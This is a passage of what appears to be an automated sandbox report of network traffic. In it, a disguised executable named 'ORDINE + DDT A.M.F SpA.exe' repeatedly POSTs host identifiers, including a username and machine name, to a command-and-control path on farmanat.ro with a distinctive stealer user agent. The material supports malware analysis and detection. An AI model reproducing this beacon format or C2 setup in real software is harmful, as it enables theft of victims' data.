                                              Nov 25, 2021 10:50:58.170049906 CET6776OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:58.222412109 CET6777INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:57 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              329192.168.11.2050172176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:58.574451923 CET6777OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:58.607743979 CET6777OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:58.660414934 CET6778INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:57 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              33192.168.11.2049869176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:23.130212069 CET6356OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:23.163805008 CET6357OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:23.214514017 CET6357INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              330192.168.11.2050173176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:59.081033945 CET6779OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:59.114654064 CET6779OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:59.164284945 CET6779INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:58 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              331192.168.11.2050174176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:59.594203949 CET6780OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:59.627924919 CET6780OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:59.683665991 CET6781INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:58 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              332192.168.11.2050175176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:00.115567923 CET6781OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:00.149828911 CET6781OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:00.202507973 CET6782INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:59 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              333192.168.11.2050176176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:00.621598959 CET6783OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:00.655038118 CET6783OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:00.705142021 CET6783INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:59 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              334192.168.11.2050177176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:01.133542061 CET6784OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:01.167103052 CET6784OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:01.217782021 CET6784INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              335192.168.11.2050178176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:01.656410933 CET6785OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:01.690049887 CET6785OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:01.738830090 CET6786INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              336192.168.11.2050179176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:02.166862011 CET6787OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:02.201144934 CET6787OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:02.254659891 CET6787INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:01 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              337192.168.11.2050180176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:02.675779104 CET6788OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:02.709252119 CET6788OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:02.758126020 CET6788INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:01 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              338192.168.11.2050181176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:03.197638988 CET6789OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:03.231167078 CET6789OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:03.291152954 CET6790INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:02 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              339192.168.11.2050182176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:03.728226900 CET6791OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:03.762459040 CET6791OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:03.813153028 CET6791INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:02 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              34192.168.11.2049870176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:23.726845980 CET6358OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:23.761006117 CET6358OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:23.811579943 CET6358INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              340192.168.11.2050183176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:04.168731928 CET6792OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:04.201977015 CET6792OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:04.251219988 CET6792INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              341192.168.11.2050184176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:04.679603100 CET6793OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:04.713089943 CET6793OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:04.762806892 CET6794INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              342192.168.11.2050185176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:05.197175026 CET6794OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:05.231309891 CET6795OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:05.289465904 CET6795INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:04 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              343192.168.11.2050186176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:05.722649097 CET6796OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:05.756973028 CET6796OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:05.815517902 CET6796INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:04 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              344192.168.11.2050187176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:06.242182970 CET6797OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:06.275868893 CET6797OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:06.330142975 CET6798INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              345192.168.11.2050188176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
